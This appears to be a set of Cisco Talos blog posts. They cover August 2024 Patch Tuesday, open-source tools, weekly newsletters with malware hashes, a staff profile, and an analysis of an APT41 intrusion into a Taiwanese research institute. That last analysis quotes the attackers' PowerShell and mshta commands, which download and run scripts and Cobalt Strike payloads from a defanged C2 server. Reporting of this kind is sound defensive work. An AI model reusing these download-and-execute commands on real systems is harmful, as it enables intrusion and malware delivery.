The most serious of the issues included in August’s Patch Tuesday is CVE-2024-38063, a remote code execution vulnerability in Windows TCP/IP.

Tuesday, August 13, 2024 15:12

Microsoft disclosed six security vulnerabilities that are actively being exploited across its products as part of the company’s regular Patch Tuesday security update.  

In all, August’s monthly round of patches from Microsoft included 87 vulnerabilities, seven of which are considered critical. In addition to the zero-days disclosed Tuesday, Microsoft also fixed a security issue that had already been publicly disclosed: CVE-2024-21302, a vulnerability in Microsoft Office that could result in unauthorized disclosure of sensitive information to malicious actors. Microsoft initially warned about the possibility that attackers could exploit this vulnerability in the wild last week, including being able to reverse older software patches that could re-open them to past vulnerabilities. 

Cisco Talos’ Vulnerability Research team discovered four of the vulnerabilities Microsoft patched this week: CVE-2024-38184, CVE-2024-38185, CVE-2024-38186 and CVE-2024-38187. These are elevation of privilege vulnerabilities in the Microsoft Windows kernel-mode driver that could allow an attacker to gain SYSTEM-level privileges.  

The most serious of the issues included in August’s Patch Tuesday is CVE-2024-38063, a remote code execution vulnerability in Windows TCP/IP. An unauthenticated attacker could exploit this vulnerability by repeatedly sending specially crafted IPv6 packets to a targeted Windows machine that could enable remote code execution. Systems that have IPv6 disabled are not susceptible to this vulnerability.  

CVE-2024-38063 has a severity score of 9.8 out of 10 and is listed as “more likely” to be exploited. 

Two other remote code execution vulnerabilities, CVE-2024-38159 and CVE-2024-38160, exist in Windows Network Virtualization, and another, CVE-2024-38140, exists in the Windows Reliable Multicast Transport Driver. All three are considered critical. 

Two of the vulnerabilities already being exploited in the wild are CVE-2024-38178, a memory corruption vulnerability in the Microsoft Scripting Engine, and CVE-2024-38193, an elevation of privilege vulnerability in the Windows Ancillary Function Driver. Though they are both zero-days, Microsoft only lists them as being “important.” 

Lastly, we’d also like to highlight two vulnerabilities in the Secure Boot security feature, CVE-2024-38090 and CVE-2024-28918, which are rated critical and important, respectively.  

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63858 – 63861 and 63864 - 63878. There are also Snort 3 rules 300980 – 300988.

Talos discovers Microsoft kernel mode driver vulnerabilities that could lead to SYSTEM privileges; Seven other critical issues disclosed

Open-source software that is free to download, deploy and modify is a vital component in the fight for cyber security. Freely available software not only helps defend systems that would otherwise be unprotected, but it also allows people to learn and develop vital cybersecurity skills. In this post, we review

Tuesday, August 13, 2024 08:20

Open-source software that is free to download, deploy and modify is a vital component in the fight for cyber security. Freely available software not only helps defend systems that would otherwise be unprotected, but it also allows people to learn and develop vital cybersecurity skills. In this post, we review how Cisco Talos supports open-source software and initiatives.  

The adoption of the early World Wide Web was greatly helped by free software. The GNU Project and the Apache Software Foundation released programs allowing anyone to create their own webserver. Administrators and engineers could practice and hone their skills in operating and developing on the platform, leading to a motivated, self-trained workforce that could apply their skills.  

Open-source software helps drive innovation. Depending on the terms of the license, open-source software can be incorporated into new software packages and services. This allows innovators to focus on providing new functionality and solving problems without having to spend valuable development time replicating perfectly good software that is already available. 

Developers need and deserve recompense; everyone needs to eat and pay their bills. However, open-source software is often developed as a non-commercial endeavor to solve a particular problem or to provide functionality that is too important to be left to the whims of private commerce. The inclusion of open-source software in other projects and services can help open-source developers fulfill objectives in spreading the open-source creed, through solving a problem well or supporting the wider community. Often, the success of an open-source project can bring employment opportunities to those who are skilled in developing or maintaining the original software, or commercial licensing opportunities. 

Cisco and Talos are committed to protecting the internet. One of the ways that we achieve this is by publishing open-source tools to enable users to protect systems, to learn about how to detect and block threats, and by providing educational content to help train the future cyber security workforce. 

The Cisco Networking Academy has trained over 20 million students in 190 countries helping people learn and gain employment in network and security. Through the Skills for All initiative, the academy offers free training and courses to help anyone build, deploy and secure technology as well as forge a career.  

Open-source security tools provide learning and development opportunities, but most importantly allow the wider security community to contribute to the global fight against cyber threats. For many systems across the planet, open-source solutions are the only protections stopping systems from becoming compromised. 

In addition to all our open-source tools, Talos has a whole range of tools, including ransomware decryptors, and data available on our GitHub repository￼. Providing open-source security software for free and supporting the community that works with these tools allows us to fulfill our mission to protect the internet and make life difficult for the bad guys.  

Snort is Talos’ open-source IDS/IPS system, which detects network-based threats and helps troubleshoot network issues. Commercial licensing allows Snort to be integrated as part of third-party solutions. Licensed solutions are deployed on over 450,000 systems across the globe, which in turn are likely to protect further systems downstream.  

Snort dates back to 1998, having undergone continuous development and innovation over the years. The latest version of the engine released in March is the first to include machine learning capabilities, allowing Snort to learn autonomously how to identify malicious network traffic, demonstrating our continued commitment to the platform. 

The open-source Snort rule base is curated and verified by Talos but largely developed by the open-source community. The twice-weekly rule release is currently downloaded by over 60 000 users.  

ClamAV is our open-source anti-malware engine. This software is also widely deployed in third-party solutions and services, notably in scanning inbound email and web connections, as well as providing end-point protection. We are aware of more than 18 million installations which we are proud to help protect.  

Ultimately, we will succeed through sharing knowledge and tools, and most importantly supporting each other. Try out one of the Skills for Allcourses, or download one of our open-source tools. Free software offers the possibility of both developing skills and solving problems.

A refresher on Talos’ open-source tools and the importance of the open-source community

As with everything nowadays, politics are sure to come into play.

Thursday, August 8, 2024 14:00

Over the next two weeks, two of the largest cybersecurity conferences in the world will take place in Las Vegas: Black Hat and DEF CON. 

That means product announcements, buzzwords and stories about “X smart appliance could burn your house down!” or something like that. Over the next two weeks, I’ll be using this space to catch readers up on the top stories, trends and talking points to come out of Hacker Summer Camp. If you’re on the ground in Vegas, follow along with us on Twitter to keep track of our talks and events.  

To no one’s surprise, AI is likely going to be in the spotlight all week, especially generative AI. Many companies will use these tools to spin up new cybersecurity products and protections, and other researchers are sure to point out the potential security pitfalls of emerging technologies.  

There is a dedicated full-day workshop to discuss holding generative AI accountable, including potential legislation that outlines how generative AI models are trained and using whose content. And AI Village at DEF CON is sure to turn up a slew of vulnerabilities in AI tools while highlighting how researchers can best disclose and help patch these security issues.  

In the vein of “how to hack X” headlines that I mentioned before, Talos’ own Dan Mazzella is presenting research on how an attacker could take over some cars’ Android-based infotainment systems to steal user data.  

Some of the systems used in Ford, Honda and GM cars could be exploited to steal data that is being transferred between the so-called “head unit” and a mobile device connected to the car, including text messages, contacts, photos and other private user information.  

And as with everything nowadays, politics are sure to come into play. With the recent news that Kamala Harris is taking over as the Democratic Party’s likely nominee for the upcoming U.S. presidential election, experts and regulators are trying to figure out what a potential Harris presidency would mean for cybersecurity and AI policy.  

Hackers are also hosting the year’s first cybersecurity-focused fundraiser for a presidential candidate with DEF CON organizers taking the lead on supporting Harris after she was supportive of the election security community in past years.  

Other elections around the globe also have cybersecurity implications, as Black Hat’s keynote will cover with (among others) Jen Easterly, the director of the U.S. Cybersecurity and Infrastructure Security Agency. Disinformation and fake news are always swirling online about any political candidate, regardless of country, and AI and deepfakes have only worsened the problem.  

And that’s before you get into any actual attempts to change votes or hack voting systems. 

**The one big thing **

Cisco Talos is actively tracking multiple malware campaigns that utilize NetSupport RAT for persistent infections. These campaigns evade detection through obfuscation and updates. Talos researchers identified multiple obfuscation and evasion techniques being used by the campaign and created appropriate detection to keep users protected. By identifying specific weaknesses in the campaign’s obfuscation techniques and identifying indicators of compromise (IOCs), we can create highly accurate detection of this campaign. 

**Why do I care? **

NetSupport Manager has been commercially available for remote device administration since 1989. Like many tools in the IT remote support industry, NetSupport Manager has been weaponized by threat actors who either cannot or do not wish to develop their own RAT. Adversaries first started using NetSuport for malicious purposes in 2017, and at this point, most security vendors widely recognize this software as a RAT. The 2020s' shift to remote work for many office workers marked an increased use of NetSupport RAT in more phishing and drive-by download campaigns, as well as being used alongside other loaders. This campaign is the most notable use of NetSupport RAT in recent years, with hundreds of known stager variants across dozens of domains used in a large-scale malicious advertising campaign. Thankfully, Snort can provide a strong defense before this malware reaches endpoints. 

**So now what? **

Talos’ first entry in our new series, “The Deep Dive with NDRT,” we dive into how our analysts craft protection against NetSupport RAT and the newest Snort rules to keep users safe from this threat.  

**Top security headlines of the week **

**A French Olympic site and cultural institution was targeted with a cyber attack over the weekend, though the effects appear to be limited.** Security experts and Olympics organizers largely expected there to be several efforts to try and disrupt the games. Despite false reports that adversaries had encrypted data belonging to the Grand Palais Réunion des musées nationau, the venue said in a statement that as of Monday morning, “no data extraction has been detected.” The institution most famously oversees the Louvre, one of the most famous art museums in the world. Its venues hosted several Olympics-related exhibitions and events over the past week, including fencing and Taekwondo competitions. The attack appears to be attempted ransomware, though an investigation with the ANSSI, France’s cybersecurity agency, is still underway. "This only concerns our internal network of shops, and not even the other activities of the RMN-Grand Palais. We immediately disconnected everything that was vital and called on the special state unit that deals with this type of problem, the French Computer Security Agency,” the Grand Palais director said in a statement after the attempted attack. (CyberScoop, Dark Reading) 

**A cyber attack knocked out Mobile Guardian, a U.K.-based mobile device management software used in the U.K.** The event largely affected students and schools in Singapore, which the Ministry of Education says led to thousands of students having their devices completely wiped. Mobile Guardian advertises itself as a cross-platform solution for K-12 schools to monitor and manage their devices. “Based on preliminary checks, about 13,000 students in Singapore from 26 secondary schools had their devices wiped remotely by the perpetrator,” the Singaporean education ministry said in a statement. Adversaries seemed to have removed some targeted devices from Mobile Guardian’s network and completely wiped the devices. The company said in a statement this week that the outage affected instances in North America, Europe and Singapore. The incident appears to stem from a misconfiguration that caused an IT outage on July 30. (TechCrunch, Bleeping Computer) 

**A ransomware attack on a blood donation non-profit forced many hospitals to tap into their emergency blood supplies and host last-minute drives.** OneBlood, which provides blood samples to many hosptials in the Southeastern U.S., was hit with a ransomware attack that forced most of its network offline. The non-profit had to switch to manual processes for several days, including printing out its own labels and having donors fill out paper forms to donate blood, which delayed their usual supply chain to hospitals. Some health care facilities had to delay non-emergency procedures until after the blood donor supply had returned to normal. Late last week, OneBlood told its more than 250 hospital partners to activate their critical blood shortage protocols, which included holding last-minute drives and calling for volunteers to donate blood asap. As of Wednesday, OneBlood says its software is returning to normal. The process was made even more difficult by the presence of Hurricane Debby, which moves through Florida and Georgia, dumping inches of rain and causing flooding in states that were heavily affected by OneBlood’s outage. (Axios, CBS News) 

**Can’t get enough Talos? **

**Upcoming events where you can find Talos **

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

The top stories coming out of the Black Hat cybersecurity conference

Pentney and his team are threat hunters and researchers who contribute to Talos’ research and reports shared with government and private sector partners.

Monday, August 5, 2024 08:00

As the adage goes: “You don’t know what you don’t know.” 

For Ryan Pentney and his team, they know what they don’t know. And they wake up every morning trying to figure out how they can answer those questions about emerging threats and some of the largest state-sponsored actors in the world. 

Pentney is Cisco Talos’ threat intelligence lead for the Asia-Pacific region, and it's his job to lead investigations into active malware threats, international threat groups and anything that’s on defenders’ minds.  

“We’re always thinking about, ‘What do we know, and what do we not know?’ And we try to start with the 'What do we know?' part,” Pentney said. “What do I need to answer these questions? Do we need to look at other methods or new tools for generating information? Are there partners we want to have discussions with?” 

Pentney and his team are threat hunters and researchers who contribute to Talos’ research and reports shared with government and private sector partners. He is specifically focused on the tactics threat actors used to perform these attacks and their potential motivations.  

“How can we figure out how to identify the actor in the future if they’re involved in other attacks? Do they have specific targets, or is it more widespread?” Pentney said. “At the end of the day, we try to figure out what we need to do to keep our customers safe.” 

But this is only the latest stop on Pentney’s journey through Talos and its predecessor, Sourcefire. In fact, Pentney joined Sourcefire almost immediately after graduating college, his first “real” job in the cybersecurity field. 

Over the past 17 years at Sourcefire and Talos, he’s done everything from vulnerability research and discovery to Snort rule writing and application development.  

His first role at Sourcefire was working under Lurene Grenier. At the time, it was only a group of six people working on detection inside Sourcefire’s Vulnerability Research Team (VRT) writing rules and signatures for the Snort intrusion prevention system and ClamAV anti-virus software. Pentney attended college studying in the broader field of computer science, learning how to write in the C and C++ languages, but at the time, “cybersecurity-focused programs weren't common,” Pentney says.  

__Pentney (second from left) was once part of a hockey team with some of his Sourcefire/Talos colleagues.__

So, much of his education had to come on the job. 

“When new vulnerabilities came out, we would sometimes need to reverse-engineer the patches to figure out what changes had taken place, and from there figure out what the original vector might have been,” he said. 

Eventually, he moved to the vulnerability research team, where he spent years searching for vulnerabilities in a wide range of products and software and disclosing potential exploitation vectors to vendors so they could be patched. 

Then, in 2015, he joined the threat hunting team under Matt Olney, who was also one of Pentney’s original Sourcefire colleagues.  

__Pentney speaking at a conference in 2016.__

During his Sourcefire days, Pentney says he is most proud of working on Razorback, an open-source framework inside Snort that enabled the advanced processing of data to protect against client-side attacks.  

His work on Razorback deepened Pentney’s interest in how exploits work and how adversaries write exploits in the first place, all things that Lurene helped teach him. Pentney even ended up advancing to the point that, for many years, he taught Talos’ in-house Exploit Development Class for customers and employees. 

“I still very much enjoy teaching whenever I get the opportunity,” Pentney said. 

When Pentney joined Sourcefire in 2008, he was only part of a team of less than 10 people where he was a solo contributor. Now, Talos is made up of more than 500 people and manages a team of 10.  

“We’ve greatly expanded our areas of focus, we have a lot of varied teams that specialize in a lot of different things, and we have our own branding and our own set of folks in charge of that,” Pentney said of Talos’ growth over the past 10 years. “It feels normal now, but I think I would have been overwhelmed if you had told me 16 years ago that we’d be working on the kinds of things we’re working on now.” 

Several things have kept Pentney at the company for almost 17 years, much of which centered around his ability to pivot between different roles in the company and learn along the way. Even today, Pentney says there is always someone at Talos he’s looking to learn from. 

From day one on the job, Pentney joked that “there were so many experts, I knew they were speaking English, but I didn’t recognize how the information was put together.” And now he’s advanced enough to the point that he is working on major international events and incidents, and now is the one disseminating that information to partners, customers and users. 

The key to Talos’ success over the years while expanding in scope and size is that management has always encouraged everyone at the company to learn and grow, Pentney said. He also fondly looks back on the many opportunities to bond with the original team at Sourcefire who are still at Talos today, including many people on the Network threat Detection and Response team who taught Pentney how to write Snort rules in the first place. 

“The overall level of expertise you can find anywhere at Talos, the openness of people in terms of wanting to share that with you if you’re interested, the teaching mentality that people have, has always been amazing,” Pentney said. “Management has always been very supportive of that, of personal growth, and expanding your mindset.” 

Looking forward into the next 10 years of Talos, Pentney said he plans on learning more about state-sponsored activity and researching new ways to track larger threat actors.  

“We are looking at leveraging our telemetry in ways that we had never considered before. There are mathematical and statistical methods we may be able to use to uncover some insights that may not be obvious,” he said.  

Outside of the office, Pentney is an avid skier and tries to take one trip out to the Rocky Mountains every year with a group of friends. And, he joked “like most of us at Talos” he enjoys playing video games. 

He also enjoys studying and learning new languages (a common talent among the Talos Threat Intelligence and Interdiction team) and speaks four languages fluently.  

__Pentney (second from left) and other Talos threat hunters gather for a team offsite in 2023.__

One thing many of his teammates, even the original Sourcefire ones, don’t know about him is that he likes to play the piano.  

“That’s something I find really relaxing and I don’t get to show off enough. It’s a really nice, meditative activity,” he said.  

If you’d like to look at some of the work Pentney and his team have completed recently, they regularly contribute to the Talos Incident Response Quarterly Trends reports and conduct intelligence on-demand requests through a Cisco Talos Incident Response retainer.

Ryan Pentney reflects on 10 years of Talos and his many roles from the Sourcefire days

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software.

Thursday, August 1, 2024 14:00

A recently discovered security issue in GitHub and other, similar, control system products seem to fit into the classic “it’s a feature, not a bug” category. 

Security researchers last week published their findings into some research of how deleted forks in GitHub work, potentially leaving the door open for a malicious actor to steal a project key and then view deleted forks and versions of any project on GitHub. 

This may not necessarily even be a \*new\* discovery, because users on social media were quick to point out that these products have always been designed this way, so it’s not like a new sort of exploit had just been published. But the publishing of these findings came after Truffle Security says a major tech company accidentally leaked a private key for an employee GitHub account, and despite totally deleting the repo thinking that would take care of the leak, it was still exposed and accessed by potentially malicious users.  

This potential issue has not been tested in similar software like GitLab or Bitbucket, but conceivably, they’ve all been designed in the same way. The major difference for GitHub is that deleted or unpublished commits can be downloaded via a fork if the user has the correct identifying hash (or at least a portion of it).  

The issue here is there is no real patch or fix to address this issue, and now it’s widely known and been publicized on the internet.  

GitHub told The Register that this is part of how the software is designed, and there doesn’t appear any efforts underway to change that. 

“GitHub is committed to investigating reported security issues. We are aware of this report and have validated that this is expected and documented behavior inherent to how fork networks work. You can read more about how deleting or changing visibility affects repository forks in our documentation,” the company said in a statement to online publication The Register. 

The lesson for users, especially if you’re a private company that primarily uses GitHub, is just to understand the inherent dangers of using open-source software like those projects that are created and managed on GitHub. (Martin Lee and I will be discussing more in tomorrow morning’s episode of Talos Takes.) 

The other option is that, if you’re a GitHub user and at some point, published a key, you should probably just assume someone has copied it by now. That means not only deleting references to that key but rotating the key and checking if it was used improperly.  

**The one big thing **

Cisco Talos recently discovered a malicious campaign that compromised a Taiwanese Government Affiliated Research Institute that started as early as July 2023, delivering Shadowpad malware, Cobalt Strike and other customized tools for post-compromise activities. The activity conducted on the victim endpoint matches the Chinese hacking group APT41. The combined use of malware, open-source tools and projects procedures and post-compromise activity matches this group method of operation. ShadowPad, widely considered the successor of PlugX, is a modular remote-access-trojan (RAT) only seen sold to Chinese hacking groups. 

**Why do I care? **

APT41 is a prolific and dangerous threat actor that all users and cybersecurity practitioners should be keeping track of. The group, also known as Amoeba, Bronze Atlas, Wicked Spider, and more, is known for carrying out Chinese state-sponsored espionage activity and other financially motivated cybercrimes. We have also uncovered that APT41 created a tailored loader to inject a proof of concept for CVE-2018-0824, a remote code execution vulnerability in Microsoft COM for Windows, directly into memory to achieve local privilege escalation. 

**So now what? **

This threat actor commonly tries to exploit CVE-2018-0824, which Microsoft has long had a patch available for. Users should ensure all Windows systems are up to date to the latest version to protect against this vulnerability (and the hundreds of others that exist in Windows anyway!). Additionally, Talos has released new ClamAV signatures and Snort rules to detect the ShadowPad malware and Cobalt Strike beacons used by APT41.  

**Top security headlines of the week **

**Another Microsoft outage just days after the massive CrowdStrike-related incident was the result of a cyber attack, according to the company.** The outage Wednesday morning affected Microsoft Outlook and the video game “Minecraft” for almost 10 hours and forced thousands of users to report issues. The incident gained increased interest in the wake of a massive outage last weekend that resulted in international disruptions and tens of millions of dollars in damages. Microsoft stated after the outage was resolved that the initial issue was caused by a distributed denial-of-service attack, and additional mitigations to defend against that DDoS attack failed. A notification on Microsoft’s website said the outage affected Microsoft Azure, the cloud platform that powers many of its services, and Microsoft 365. It also said cloud systems Intune and Entra were affected. Even though Microsoft had no direct involvement in the previous outage, the company has been under a microscope since the incident. That outage was caused by a faulty update to CrowdStrike Falcon that was pushed to many versions of Windows 11. (BBC, Forbes) 

**A new version of the Mandrake Android spyware appears to be spreading through phony apps on the Google Play store.** The revised spyware, used to unknowingly track users’ location and activity on their mobile devices, has been downloaded more than 32,000 times since 2022, according to new research. The original version of Mandrake was active between two periods, one in 2016 and 2017 and another between 2018 and 2020. Besides the usual spyware functions, Mandrake can completely wipe a device with a killswitch, leaving no trace of the malware. Spyware commonly targets highly vulnerable individuals, including politicians, activists and journalists. Spouses and romantic partners may also use it to unknowingly track their significant others. The most popular fake app used was AirFS, an advertised file-sharing app, that was downloaded more than 30,000 times before it was removed from the Google Play store. Once the user installs the phony app, the Mandrake malware is unknowingly installed, and it asks for the user’s permission to draw overlays on their screen under the guise of the illegitimate app. (Bleeping Computer, Security Affairs) 

**North Korean APT Andariel is accused of carrying out a series of espionage-focused campaigns targeting U.S. weapon systems over the past two years.** Security researchers say the state-sponsored group targeted healthcare providers, defense contractors and nuclear facilities, possibly to steal information that could improve the country’s own weapons programs. North Korea is constantly using its posession of nuclear weapons to try and intimidate Western countries. Separately, the U.S. indicted a North Korean citizen for his alleged involvement in several cyber attacks against American hospitals. The individual, suspected of having ties to North Korea’s Reconnaissance General Bureau, allegedly targeted hospitals in Florida and Kansas, healthcare providers in Arkansas and Connecticut, and a clinic in Colorado. The U.S. State Department is offering a reward of up to $10 million for information that leads to the arrest of Rim Jong Hyok. (The Record, CNN) 

**Can’t get enough Talos? **

*   Ransomware and email attacks are hitting businesses more than ever before 
*   Cisco Talos: An oral history 
*   Vulnerability Roundup: Out-of-bounds read vulnerability in NVIDIA driver; Open-source flashcard software contains multiple security issues 
*   Talos Takes Ep. #192: Threat actor trends and the most prevalent malware from the past quarter 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

There is no real fix to the security issues recently found in GitHub and other similar software

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Thursday, August 1, 2024 08:00

*   Cisco Talos discovered a malicious campaign that compromised a Taiwanese government-affiliated research institute that started as early as July 2023, delivering the ShadowPad malware, Cobalt Strike and other customized tools for post-compromise activities.
*   The activity conducted on the victim endpoint matches the hacking group APT41, alleged by the U.S. government to be comprised of Chinese nationals. Talos assesses with medium confidence that the combined usage of malware, open-source tools and projects, procedures and post-compromise activity matches this group’s usual methods of operation.
*   The ShadowPad malware used in the current campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader to load the customized second-stage loader for launching the payload.
*   We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.

**Taiwanese Government-Affiliated Research Institute compromised by Chinese Actor**

In August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts in the environment of a Taiwanese government-affiliated research institute. The victim in this attack was a research institute in Taiwan, affiliated with the government, that specializes in computing and associated technologies. The nature of research and development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them.

**Chinese Threat Actors likely Behind the Attacks**

Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups. Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups. The malware was publicly reported being used by APT41, which is a hacking group believed to be based out of Chengdu, China, according to the U.S. Department of Justice.  Along with APT41 it has also been used by other Chinese hacking groups like Mustang Panda and the Tonto Team.

During the investigation, we observed a couple TTPs or IoC that were observed in previous reported campaigns, including the following:

*   **The same second stage loader binary**: A second stage loader, that acts as a successor to the initial side-loaded ShadowPad loader, discovered by Talos was also linked to ShadowPad  and previously associated with ShadowPad publicly. We have also observed identical loading mechanisms, infection chains and file names being utilized in the current attacks with reliable previous open-source reporting.  
*   **Infrastructure overlapping:** Beside the binary connection, we also found a C2 (103.56.114\[.\]69) that was reported by Symantec. Although the campaign reportedly ran in April 2022, which is more than one year before the campaign we discovered, there were a few similarities between the TTPs observed in the two campaigns. This includes using the same ShadowPad Bitdefender loader, using similar file names for the tool, using Filezilla for moving files between endpoints and using the WebPass tool for dumping credentials. 
*   **The employment of Bitdefender executable for sideloading:** The malicious actor leverages Bitdefender where it uses an eleven year old executable to sideload the DLL-based ShadowPad loader. This technique has been seen in a variety of reports which have been attributed to APT41. This technique has been reported in multiple reports (Reports: 1, 2, 3, 4).

**Chinese Speaking Threat Actor**

This attack saw the use of a unique Cobalt Strike loader, written in GoLang is meant to evade detection of Cobalt Strike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on GitHub and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and technical tutorial articles.

The Cobalt Strike loader also consists of file and directory path strings in Simplified Chinese, indicating that the threat actors that built/compiled the loader were well-versed in the language.

__The Github repository of Cobalt Strike loader.__

__Technical tutorial article on making anti-AV__ __Cobalt Strike backdoor____.__

**Tactic, Technique and Procedure Analysis**

In August 2023, Cisco Talos detected abnormal PowerShell commands connected to an IP address to download PowerShell script for execution in the environment of the target. We performed an investigation based on our telemetry and found the earliest infiltration trace from mid July, 2023. We currently lacked sufficient evidence to conclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network. 

Upon accessing the network, attackers start to gain a foothold by executing malicious code and binaries on the machine. On the machine with the web server, a webshell is installed to enable the threat actor’s ability to perform discovery and execution. The threat actors also dropped malwares including ShadowPad and Cobalt Strike with three different approaches: the installed webshell, RDP access and the reverse shell.

_Webshell drop_

C:/www/un/imjp14k.dll

C:/www/un/service.exe

C:/www/un/imjp14k.dll.dat

_RDP drop_

C:/Users/\[hide\]/Desktop/log.dll

C:/Users/\[hide\]/Desktop/imjp14k.dll

C:/Users/\[hide\]/Desktop/service.exe

C:/Users/\[hide\]/Desktop/imjp14k.dll.dat

C:/Users/\[hide\]/Desktop/log.dll.dat

_Reverse shell drop_

C:/Users/Public/calc.exe

C:/Users/Public/service.exe

C:/Users/Public/imjp14k.dll

C:/Users/Public/imjp14k.dll.dat

C:/Users/Public/log.dll

C:/Users/Public/log.dll.dat

We noticed that a couple of the ShadowPad components were detected and quarantined by our solution when being dropped. The threat actor  later changed their tactic to  bypass the detection.The first attempt was running the following PowerShell commands to launch the PowerShell script for downloading additional scripts (PowerShell and HTA) to run backdoor in memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://103.56.114\[.\]69:8085/p.ps1');test123"

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://www.nss.com\[.\]tw/p.ps1');test123"

mshta https://www.nss.com\[.\]tw/1.hta

powershell -nop -w hidden 

\-encodedcommand “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM..."

However, the attempt was again detected and interrupted before the attackers could carry out further actions. Later on, the attackers used another two PowerShell commands to download Cobalt Strike malware from a compromised C2 server (www.nss.com\[.\]tw). The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine. The following command was used by the threat actor to download anti-AV malware and run the malware in the victim's host machine. A more detailed description about the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis. 

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc.exe');"

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc2.exe'); "

During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below. 

The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.

**Information gathering and exfiltration**

